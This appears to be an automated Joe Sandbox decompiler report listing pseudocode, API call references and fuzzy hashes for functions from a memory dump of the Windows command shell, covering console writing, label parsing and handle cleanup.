                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Console$Write_get_osfhandle$Mode
                                    • String ID:
                                    • API String ID: 1066134489-0
                                    • Opcode ID: 5ff039ec64d9216b4eed72b3b2587159a5a2640a6f7a0d46ecb795624129ba88
                                    • Instruction ID: b2367d8543b8867467642ad135a330f00be212c9dff3c6b42c8ea4a752b78ace
                                    • Opcode Fuzzy Hash: 5ff039ec64d9216b4eed72b3b2587159a5a2640a6f7a0d46ecb795624129ba88
                                    • Instruction Fuzzy Hash: 4741C431B006199BDF2CDEB8D85DBAE77E9EF90308F05446AE906DB181EB74D940CB50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 72%
                                    			E011DE5A8(struct HINSTANCE__** __ebx, struct HINSTANCE__* __edx, intOrPtr __edi, void* __ebp, void* _a4, intOrPtr _a8, struct HINSTANCE__* _a12, struct HINSTANCE__* _a16, struct HINSTANCE__* _a20, struct HINSTANCE__* _a24, struct HINSTANCE__* _a28, void _a32, void* _a536, intOrPtr _a544, void* _a548, int _a552, char _a556, int _a560, signed int _a572) {
                                    				void* _v0;
                                    				struct HINSTANCE__* _t57;
                                    				struct HINSTANCE__* _t59;
                                    				struct HINSTANCE__* _t63;
                                    				struct HINSTANCE__* _t64;
                                    				struct HINSTANCE__ _t66;
                                    				int _t69;
                                    				int _t74;
                                    				struct HINSTANCE__* _t76;
                                    				struct HINSTANCE__* _t83;
                                    				struct HINSTANCE__* _t84;
                                    				void* _t85;
                                    				struct HINSTANCE__* _t86;
                                    				struct HINSTANCE__* _t87;
                                    				struct HINSTANCE__* _t88;
                                    				struct HINSTANCE__* _t100;
                                    				struct HINSTANCE__** _t102;
                                    				void* _t103;
                                    				struct HINSTANCE__* _t108;
                                    				struct HINSTANCE__ _t114;
                                    				intOrPtr _t132;
                                    				struct HINSTANCE__* _t133;
                                    				void* _t134;
                                    				void* _t135;
                                    				struct HINSTANCE__* _t136;
                                    				struct HINSTANCE__* _t137;
                                    				signed int _t140;
                                    				void* _t142;
                                    
                                    				_t132 = __edi;
                                    				_t126 = __edx;
                                    				_t102 = __ebx;
                                    				goto L1;
                                    				L33:
                                    				__eflags =  *((short*)( *((intOrPtr*)(_t126 + 0x38)))) - 0x3a;
                                    				if( *((short*)( *((intOrPtr*)(_t126 + 0x38)))) != 0x3a) {
                                    					goto L4;
                                    				}
                                    				_t136 = E011E00B0(0x50);
                                    				__eflags = _t136;
                                    				if(_t136 == 0) {
                                    					L73:
                                    					_t57 = 1;
                                    					L32:
                                    					_pop(_t134);
                                    					_pop(_t135);
                                    					_pop(_t103);
                                    					__eflags = _a572 ^ _t140;
                                    					return E011E6FD0(_t57, _t103, _a572 ^ _t140, _t126, _t134, _t135);
                                    				}
                                    				_t136->i = 0;
                                    				_t63 = E011DDF40(L"GOTO");
                                    				 *(_t136 + 0x38) = _t63;
                                    				__eflags = _t63;
                                    				if(_t63 == 0) {
                                    					goto L73;
                                    				}
                                    				_t64 = E011DDF40( *((intOrPtr*)(_a24 + 0x38)));
                                    				 *(_t136 + 0x3c) = _t64;
                                    				__eflags = _t64;
                                    				if(_t64 == 0) {
                                    					goto L73;
                                    				}
                                    				_t126 = 1;
                                    				_t64->i = 0x20;
                                    				 *(_t136 + 0x40) = 0;
                                    				_a28 = 1;
                                    				L13:
                                    				if(_t132 != 0) {
                                    					__eflags = _t136;
                                    					if(_t136 != 0) {
                                    						_a20 = 0;
                                    					}
                                    				}
                                    				_t114 = _t136->i;
                                    				if(_t114 != 0 ||  *( *(_t136 + 0x38)) != 0x3a) {
                                    					if(_t126 != 0) {
                                    						_a28 = 0;
                                    						_t66 = _t114;
                                    					} else {
                                    						_t66 = _t114;
                                    						if( *0x11fd0c8 == 1) {
                                    							_t66 = _t114;
                                    							__eflags = _t114 - 0x3b;
                                    							if(_t114 != 0x3b) {
                                    								__eflags =  *0x1218530;
                                    								_t66 = _t114;
                                    								if( *0x1218530 == 0) {
                                    									E011F6FF0(_t114);
                                    									_t126 = 0;
                                    									E011F2ED0(_t136, 0);
                                    									E011E25D9(L"\r\n");
                                    									_t66 = _t136->i;
                                    									_t140 = _t140 + 4;
                                    								}
                                    							}
                                    						}
                                    					}
                                    					if(_t66 == 0x3b) {
                                    						_t136 =  *(_t136 + 0x38);
                                    					}
                                    					_a552 = 0;
                                    					_a556 = 1;
                                    					_a560 = 0x104;
                                    					memset( &_a32, 0, 0x104);
                                    					_t140 = _t140 + 0xc;
                                    					if(_a556 == 0) {
                                    						_t69 = 0x104;
                                    					} else {
                                    						_t69 = 0x7fe7;
                                    					}
                                    					if(E011E0C70( &_a32, _t69) < 0) {
                                    						E011E0DE8(_t70,  &_a32);
                                    						goto L73;
                                    					} else {
                                    						if(_t136 == 0) {
                                    							_t136 = 0;
                                    							_a16 = 0;
                                    							L28:
                                    							__imp__??_V@YAXPAX@Z(_a552);
                                    							_t140 = _t140 + 4;
                                    							goto L29;
                                    						}
                                    						if( *_t136 != 0 || E011DDFC0(0x2a,  *(_t136 + 0x38),  &_a16) != 0xffffffff) {
                                    							L25:
                                    							_t126 = _t136;
                                    							_a16 = E011E0E00(2, _t136);
                                    							E011E06C0(2);
                                    							_t74 = GetConsoleOutputCP();
                                    							 *0x1203854 = _t74;
                                    							GetCPInfo(_t74, 0x1203840);
                                    							_t137 =  *0x11fd5f8; // 0x0
                                    							if(_t137 == 0) {
                                    								_t76 =  *0x11fd0d0; // 0xffffffff
                                    								__eflags = _t76 - 0xffffffff;
                                    								if(_t76 != 0xffffffff) {
                                    									L67:
                                    									__eflags = _t76;
                                    									if(_t76 != 0) {
                                    										_t137 = GetProcAddress(_t76, "SetThreadUILanguage");
                                    										 *0x11fd5f8 = _t137;
                                    									}
                                    									L69:
                                    									__eflags = _t137;
                                    									if(_t137 != 0) {
                                    										goto L26;
                                    									}
                                    									SetThreadLocale(0x409);
                                    									L27:
                                    									_t136 = _a12;
                                    									goto L28;
                                    								}
                                    								_t76 = GetModuleHandleW(L"KERNEL32.DLL");
                                    								_t137 =  *0x11fd5f8; // 0x0
                                    								 *0x11fd0d0 = _t76;
                                    								__eflags = _t76 - 0xffffffff;
                                    								if(_t76 == 0xffffffff) {
                                    									goto L69;
                                    								}
                                    								goto L67;
                                    							}
                                    							L26:
                                    							 *0x12194b4(0);
                                    							_t137->i();
                                    							goto L27;
                                    						} else {
                                    							_t83 = E011DD7D4( *(_t136 + 0x38), 0x2a);
                                    							__eflags = _t83;
                                    							if(_t83 != 0) {
                                    								goto L25;
                                    							}
                                    							_t39 = _t83 + 0x3f; // 0x3f
                                    							_t84 = E011DD7D4( *(_t136 + 0x38), _t39);
                                    							__eflags = _t84;
                                    							if(_t84 != 0) {
                                    								goto L25;
                                    							}
                                    							_t131 = _a552;
                                    							__eflags = _a552;
                                    							if(__eflags == 0) {
                                    								_t131 =  &_a32;
                                    							}
                                    							_t85 = E011E10B0(_t136, _t131, __eflags, _a560);
                                    							__eflags = _t85 - 2;
                                    							if(_t85 != 2) {
                                    								goto L25;
                                    							} else {
                                    								__eflags =  *(_t136 + 0x34);
                                    								if( *(_t136 + 0x34) == 0) {
                                    									L61:
                                    									_t86 = _a552;
                                    									__eflags = _t86;
                                    									if(__eflags == 0) {
                                    										_t86 =  &_a32;
                                    									}
                                    									_t126 =  *_t102;
                                    									_push(_t86);
                                    									_push(_t102[1]);
                                    									_t87 = E011E1F52(_t102, _t136,  *_t102, _t132, _t136, __eflags);
                                    									__eflags = _t87;
                                    									if(_t87 != 0) {
                                    										goto L71;
                                    									} else {
                                    										_t136 = 0;
                                    										_a12 = 1;
                                    										_a8 = 0;
                                    										goto L28;
                                    									}
                                    								} else {
                                    									_t126 = _t136;
                                    									_t88 = E011F76C0(_a24, _t136);
                                    									__eflags = _t88;
                                    									if(_t88 != 0) {
                                    										L71:
                                    										__imp__??_V@YAXPAX@Z(_a544);
                                    										_t140 = _t140 + 4;
                                    										_t57 = 1;
                                    										goto L32;
                                    									}
                                    									goto L61;
                                    								}
                                    							}
                                    						}
                                    					}
                                    				} else {
                                    					L41:
                                    					_t136 = _a16;
                                    					L29:
                                    					if( *0x1213cc4 != _t102) {
                                    						L78:
                                    						_t57 = _t136;
                                    						goto L32;
                                    					} else {
                                    						_t132 = _a20;
                                    						_t126 = _a24;
                                    						L1:
                                    						if( *0x11fd544 != 0) {
                                    							E011F921A(_t102, _t132);
                                    							_t126 = _a24;
                                    						}
                                    						 *0x11fd590 = 0;
                                    						if( *0x1213cc9 == 0 || _t132 == 0) {
                                    							goto L4;
                                    						} else {
                                    							goto L33;
                                    						}
                                    					}
                                    				}
                                    				L4:
                                    				_t133 = E011E0662(_t102);
                                    				if(_t133 == 0xffffffff) {
                                    					goto L73;
                                    				}
                                    				_t59 = E011DEEF0(3, _t133, _t102[4]);
                                    				_t136 = _t59;
                                    				__imp___tell(_t133);
                                    				_t102[2] = _t59;
                                    				_t142 = _t140 + 4;
                                    				_t3 = _t133 - 3; // -3
                                    				_t108 = 0;
                                    				_t126 = _t133;
                                    				if(_t3 > 0x5b) {
                                    					L8:
                                    					__imp___close(_t133);
                                    					_t140 = _t142 + 4;
                                    					if(_t136 == 0) {
                                    						goto L41;
                                    					}
                                    					if(_t136 == 1 ||  *0x120f980 == 0x234a) {
                                    						E011F82EB(_t108);
                                    						__eflags =  *0x11fd0c8 - 1;
                                    						if( *0x11fd0c8 == 1) {
                                    							__eflags =  *0x1218530;
                                    							if( *0x1218530 == 0) {
                                    								E011F6FF0(_t108);
                                    								E011DC108(_t108, 0x2371, 1, 0x1203892);
                                    								_t140 = _t140 + 0xc;
                                    							}
                                    						}
                                    						E011F9287(_t108);
                                    						__imp__longjmp(0x120b8b8, 1);
                                    						goto L78;
                                    					} else {
                                    						if(_t136 == 0xffffffff) {
                                    							_t57 = _a16;
                                    							goto L32;
                                    						} else {
                                    							_t132 = _a20;
                                    							_t126 = _a28;
                                    							goto L13;
                                    						}
                                    					}
                                    				}
                                    				if(_t133 > 0x1f) {
                                    					_t44 = _t133 - 0x20; // -32
                                    					_t100 = 1 + (_t44 >> 5);
                                    					__eflags = _t100;
                                    					_t108 = _t100;
                                    					do {
                                    						_t126 = _t126 - 0x20;
                                    						_t100 = _t100 - 1;
                                    						__eflags = _t100;
                                    					} while (_t100 != 0);
                                    				}
                                    				asm("btr eax, edx");
                                    				goto L8;
                                    			}

                                    APIs
                                    • _tell.MSVCRT ref: 011DE5F9
                                    • _close.MSVCRT ref: 011DE62C
                                    • memset.MSVCRT ref: 011DE6CC
                                    • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00007FE7), ref: 011DE736
                                    • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,01203840), ref: 011DE747
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011DE772
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: ConsoleInfoOutput_close_tellmemset
                                    • String ID:
                                    • API String ID: 1380661413-0
                                    • Opcode ID: 7c9ce815e34ec76f5b68321474e989b27e75f4b7abf43dc1482f8475a50fef48
                                    • Instruction ID: 1e04259f300a00a2ba5e78bc717ddac8be1921d31cde062bcb5a87e7d41ca4f4
                                    • Opcode Fuzzy Hash: 7c9ce815e34ec76f5b68321474e989b27e75f4b7abf43dc1482f8475a50fef48
                                    • Instruction Fuzzy Hash: 02411A30A057018BDB3DDF9CE45C72ABBE2AF84319F14052CD9559B2E5DB709885CB47
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 19%
                                    			E011E2616(long __ecx, DWORD* __edx) {
                                    				void _v8;
                                    				void* _t4;
                                    				long _t5;
                                    				int _t21;
                                    				long _t43;
                                    
                                    				_push(__ecx);
                                    				_t40 = __edx;
                                    				_t43 = 0;
                                    				if(__edx <= 0) {
                                    					L5:
                                    					_t5 = _t43;
                                    					L6:
                                    					return _t5;
                                    				}
                                    				if(E011E269C(_t4) != 0) {
                                    					__imp__AcquireSRWLockShared(0x1217f20);
                                    					_t7 =  &_v8;
                                    					__imp___get_osfhandle(0);
                                    					_t21 = WriteConsoleW( &_v8, 1, __ecx, __edx, _t7);
                                    					if(_t21 == 0) {
                                    						_t43 = GetLastError();
                                    					}
                                    					__imp__ReleaseSRWLockShared(0x1217f20);
                                    				} else {
                                    					_t40 = __edx + __edx;
                                    					_t21 = E011E27C8( &_v8, __ecx, _t40,  &_v8);
                                    				}
                                    				if(_t21 == 0 || _v8 != _t40) {
                                    					_t43 = GetLastError();
                                    					if(_t43 == 0) {
                                    						_t43 = 0x70;
                                    					}
                                    					if(E011E0178(_t10) == 0) {
                                    						if(E011F9953(_t11, 1) == 0) {
                                    							E011F985A(_t43);
                                    						} else {
                                    							_push(0);
                                    							_push(0x2364);
                                    							E011DC5A2(1);
                                    						}
                                    						_t5 = 1;
                                    						goto L6;
                                    					} else {
                                    						_push(0);
                                    						_push(0x1d);
                                    						E011DC5A2(1);
                                    						goto L5;
                                    					}
                                    				} else {
                                    					goto L5;
                                    				}
                                    			}

                                    APIs
                                      • Part of subcall function 011E269C: _get_osfhandle.MSVCRT ref: 011E26A7
                                      • Part of subcall function 011E269C: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011DC5F8,?,?,?), ref: 011E26B6
                                      • Part of subcall function 011E269C: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,?,?,011DC5C6), ref: 011E26D2
                                      • Part of subcall function 011E269C: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,00000002), ref: 011E26E1
                                      • Part of subcall function 011E269C: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011E26EC
                                      • Part of subcall function 011E269C: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,011DC5C6), ref: 011E26F5
                                    • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,00000000,?,?,0120B980,00000002,00000000,?,011E9CA6,%s %s ,?,00000000,00000000), ref: 011E2667
                                    • _get_osfhandle.MSVCRT ref: 011E2677
                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,011E9CA6,%s %s ,?,00000000,00000000), ref: 011E267F
                                    • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20), ref: 011E2694
                                      • Part of subcall function 011E27C8: _get_osfhandle.MSVCRT ref: 011E27DB
                                      • Part of subcall function 011E27C8: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,0120B980,000000FF,011FD620,00002000,00000000,00000000), ref: 011E281C
                                      • Part of subcall function 011E27C8: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,011FD620,-00000001,?,00000000), ref: 011E2831
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
                                    • String ID:
                                    • API String ID: 4057327938-0
                                    • Opcode ID: 748438cf8469d61f7657e911d6be472636f5ec2834d7814663d1cd859f12a45c
                                    • Instruction ID: 82dd1b16d21cdff306abb0ec4e33d0a93c885e6816a1dd55a0f07e385e648846
                                    • Opcode Fuzzy Hash: 748438cf8469d61f7657e911d6be472636f5ec2834d7814663d1cd859f12a45c
                                    • Instruction Fuzzy Hash: BF210B32740B066BEF2C66E97C6DB6A36DCDBA8659F11053DFA0AD6180DF70CC004A61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 79%
                                    			E011E27C8(void* __eax, void* __edx, long _a4, DWORD* _a8) {
                                    				void* _v8;
                                    				long _v12;
                                    				long _v16;
                                    				long _t15;
                                    				void* _t17;
                                    				void* _t24;
                                    				DWORD* _t29;
                                    				long _t31;
                                    				long _t32;
                                    
                                    				_t31 = _a4;
                                    				_t23 = __edx;
                                    				_v16 = _t31;
                                    				__imp___get_osfhandle(_t24);
                                    				_v8 = __eax;
                                    				if( *0x121805c != 0) {
                                    					return WriteFile(__eax, __edx, _t31, _a8, 0);
                                    				}
                                    				_t29 = _a8;
                                    				while(_t31 > 0x2000) {
                                    					_t15 = WideCharToMultiByte( *0x1203854, 0, _t23, 0x1000, 0x11fd620, 0x2000, 0, 0);
                                    					_v12 = _t15;
                                    					_t23 =  &(_t23[0x1000]);
                                    					_t31 = _t31 - 0x2000;
                                    					if(WriteFile(_v8, 0x11fd620, _t15, _t29, 0) == 0 ||  *_t29 != _v12) {
                                    						L9:
                                    						_t17 = 0;
                                    						L7:
                                    						return _t17;
                                    					} else {
                                    						continue;
                                    					}
                                    				}
                                    				if(_t31 == 0) {
                                    					L6:
                                    					 *_t29 = _v16;
                                    					_t17 = 1;
                                    					goto L7;
                                    				}
                                    				_t5 = WideCharToMultiByte( *0x1203854, 0, _t23, 0xffffffff, 0x11fd620, 0x2000, 0, 0) - 1; // -1
                                    				_t32 = _t5;
                                    				if(WriteFile(_v8, 0x11fd620, _t32, _t29, 0) == 0 ||  *_t29 != _t32) {
                                    					goto L9;
                                    				} else {
                                    					goto L6;
                                    				}
                                    			}

                                    APIs
                                    • _get_osfhandle.MSVCRT ref: 011E27DB
                                    • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,0120B980,000000FF,011FD620,00002000,00000000,00000000), ref: 011E281C
                                    • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,011FD620,-00000001,?,00000000), ref: 011E2831
                                    • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0120B980,?,?,00000000), ref: 011ED70D
                                    • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,0120B980,00001000,011FD620,00002000,00000000,00000000,00000000), ref: 011ED730
                                    • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,011FD620,00000000,?,00000000), ref: 011ED74E
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                    • String ID:
                                    • API String ID: 3249344982-0
                                    • Opcode ID: 2b8ebd5a962cbe2294487688cc4a196402efabeff171a66c39aa2ed5b3fb2c56
                                    • Instruction ID: 4936cec639dff8ee6a99c22ccfc33561d2be85aaf3cdb5d6b5a3f60f827fc540
                                    • Opcode Fuzzy Hash: 2b8ebd5a962cbe2294487688cc4a196402efabeff171a66c39aa2ed5b3fb2c56
                                    • Instruction Fuzzy Hash: 8421B331A84608BBEF358EA5AC0DF6A7BFDEB14751F204169FA04A7184D7B05D40DB94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 91%
                                    			E011F265F(int* __ecx) {
                                    				void** _v0;
                                    				void* _v8;
                                    				int _t18;
                                    				void** _t29;
                                    				void** _t32;
                                    				void* _t39;
                                    				void* _t42;
                                    
                                    				_push(__ecx);
                                    				_t39 = __ecx;
                                    				_t2 = _t39 + 4; // 0x4
                                    				_t29 = _t2;
                                    				_t32 = _t29;
                                    				E011F2D6D(_t32,  &_v8);
                                    				_t18 =  *__ecx - 1;
                                    				 *__ecx = _t18;
                                    				if(_t18 != 0) {
                                    					_t42 = _v8;
                                    					goto L18;
                                    				} else {
                                    					_t33 = __ecx[2];
                                    					if(__ecx[2] != 0) {
                                    						E011F2DB4(_t33);
                                    					}
                                    					_t42 = 0;
                                    					 *(_t39 + 8) = 0;
                                    					_t34 =  *(_t39 + 0xc);
                                    					if( *(_t39 + 0xc) != 0) {
                                    						E011F2DB4(_t34);
                                    					}
                                    					_t35 = _v8;
                                    					 *(_t39 + 0xc) = _t42;
                                    					if(_v8 != 0) {
                                    						E011F2DE9(_t35);
                                    					}
                                    					_t18 = E011F25D6(_t35);
                                    					if(_t18 == 0) {
                                    						_t8 = _t39 + 0x18; // 0x18
                                    						_t32 = _t8;
                                    						E011F170A(_t32);
                                    						if( *(_t39 + 0xc) != _t42 && CloseHandle( *(_t39 + 0xc)) == 0) {
                                    							L10:
                                    							_push(_t32);
                                    							L11:
                                    							_t32 = _v0;
                                    							E011F2D56();
                                    						}
                                    						if( *(_t39 + 8) != _t42 && CloseHandle( *(_t39 + 8)) == 0) {
                                    							goto L10;
                                    						}
                                    						if( *_t29 != _t42 && CloseHandle( *_t29) == 0) {
                                    							goto L10;
                                    						}
                                    						_t18 = RtlFreeHeap(GetProcessHeap(), _t42, _t39);
                                    						L18:
                                    						if(_t42 != 0) {
                                    							_t18 = ReleaseMutex(_t42);
                                    							if(_t18 == 0) {
                                    								_push(_t32);
                                    								goto L11;
                                    							}
                                    						}
                                    					}
                                    				}
                                    				return _t18;
                                    			}











                                    APIs
                                      • Part of subcall function 011F2D6D: WaitForSingleObjectEx.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,000000FF,00000000,00000000,00000000,?,011F1838,?), ref: 011F2D7C
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?), ref: 011F26CD
                                      • Part of subcall function 011F2DB4: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,?,011F26A5,?), ref: 011F2DBD
                                      • Part of subcall function 011F2DB4: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,00000000,?,011F26A5,?), ref: 011F2DC6
                                      • Part of subcall function 011F2DB4: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,011F26A5,?), ref: 011F2DDF
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 011F26ED
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 011F26FD
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?), ref: 011F2709
                                    • RtlFreeHeap.NTDLL(00000000), ref: 011F2710
                                    • ReleaseMutex.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?), ref: 011F2720
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: CloseHandle$ErrorHeapLast$FreeMutexObjectProcessReleaseSingleWait
                                    • String ID:
                                    • API String ID: 2383944720-0
                                    • Opcode ID: 66541a32a584ae4daf0899b296677aaddbc20246ae0d8ccd2d74f64a32118042
                                    • Instruction ID: 80a31ae270d6647d85b80ab13ddfc60267b43e5048c5ec5cad5e65a9cb50fdb9
                                    • Opcode Fuzzy Hash: 66541a32a584ae4daf0899b296677aaddbc20246ae0d8ccd2d74f64a32118042
                                    • Instruction Fuzzy Hash: 7D21A130601516ABDF2DEF6AE86896EBB69FF60714714822DEB0583544DF30D891CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEAB7
                                      • Part of subcall function 011DEA40: iswspace.MSVCRT ref: 011DEB2D
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB49
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB6D
                                    • _wcsicmp.MSVCRT ref: 011F6EFC
                                    • _wcsicmp.MSVCRT ref: 011F6F1B
                                    • _wcsicmp.MSVCRT ref: 011F6F41
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: _wcsicmpwcschr$iswspace
                                    • String ID: KEYS$LIST$OFF
                                    • API String ID: 3924973218-4129271751
                                    • Opcode ID: 9b0b64ebf699e7cecb5abf8562cd04f01e497797f6b747f59ee6c090cb856c46
                                    • Instruction ID: 1e7c37c61c9c63b0c04d1cd5086850bc3b94e1d06a47020f7c0a798409792fff
                                    • Opcode Fuzzy Hash: 9b0b64ebf699e7cecb5abf8562cd04f01e497797f6b747f59ee6c090cb856c46
                                    • Instruction Fuzzy Hash: 33118C32708712EAA31DEB2EFC698237798FBE4624391801EE703861C6DF215C41C763
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 92%
                                    			E011E6CE1(void* __eax) {
                                    				void** _v0;
                                    				void* _v8;
                                    				int _t19;
                                    				void** _t30;
                                    				void* _t32;
                                    				void** _t33;
                                    				void* _t40;
                                    				void* _t43;
                                    
                                    				_t32 =  *0x11fd010; // 0x0
                                    				if(_t32 != 0) {
                                    					_push(_t32);
                                    					_t40 = _t32;
                                    					_t2 = _t40 + 4; // 0x4
                                    					_t30 = _t2;
                                    					_t33 = _t30;
                                    					E011F2D6D(_t33,  &_v8);
                                    					_t19 =  *_t40 - 1;
                                    					 *_t40 = _t19;
                                    					if(_t19 != 0) {
                                    						_t43 = _v8;
                                    						goto L20;
                                    					} else {
                                    						_t34 =  *(_t40 + 8);
                                    						if( *(_t40 + 8) != 0) {
                                    							E011F2DB4(_t34);
                                    						}
                                    						_t43 = 0;
                                    						 *(_t40 + 8) = 0;
                                    						_t35 =  *(_t40 + 0xc);
                                    						if( *(_t40 + 0xc) != 0) {
                                    							E011F2DB4(_t35);
                                    						}
                                    						_t36 = _v8;
                                    						 *(_t40 + 0xc) = _t43;
                                    						if(_v8 != 0) {
                                    							E011F2DE9(_t36);
                                    						}
                                    						_t19 = E011F25D6(_t36);
                                    						if(_t19 == 0) {
                                    							_t8 = _t40 + 0x18; // 0x18
                                    							_t33 = _t8;
                                    							E011F170A(_t33);
                                    							if( *(_t40 + 0xc) != _t43 && CloseHandle( *(_t40 + 0xc)) == 0) {
                                    								L12:
                                    								_push(_t33);
                                    								L13:
                                    								_t33 = _v0;
                                    								E011F2D56();
                                    							}
                                    							if( *(_t40 + 8) != _t43 && CloseHandle( *(_t40 + 8)) == 0) {
                                    								goto L12;
                                    							}
                                    							if( *_t30 != _t43 && CloseHandle( *_t30) == 0) {
                                    								goto L12;
                                    							}
                                    							_t19 = RtlFreeHeap(GetProcessHeap(), _t43, _t40);
                                    							L20:
                                    							if(_t43 != 0) {
                                    								_t19 = ReleaseMutex(_t43);
                                    								if(_t19 == 0) {
                                    									_push(_t33);
                                    									goto L13;
                                    								}
                                    							}
                                    						}
                                    					}
                                    					return _t19;
                                    				} else {
                                    					return __eax;
                                    				}
                                    			}












                                    APIs
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?), ref: 011F26CD
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 011F26ED
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 011F26FD
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?), ref: 011F2709
                                    • RtlFreeHeap.NTDLL(00000000), ref: 011F2710
                                    • ReleaseMutex.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?), ref: 011F2720
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: CloseHandle$Heap$FreeMutexProcessRelease
                                    • String ID:
                                    • API String ID: 1689195821-0
                                    • Opcode ID: 43aff9ed9de6e9e2c5b8d704d9dc066bda54670e15678b7029d74873cc551807
                                    • Instruction ID: 2ffab06c7dab5df2767991c90d1485b4fbf639a71313ecd42036d1c362f98804
                                    • Opcode Fuzzy Hash: 43aff9ed9de6e9e2c5b8d704d9dc066bda54670e15678b7029d74873cc551807
                                    • Instruction Fuzzy Hash: D7219530201502ABDF2DEF6AD868D6EBB69FF60714714822DEB4583544DF30D891CF91
                                    Uniqueness

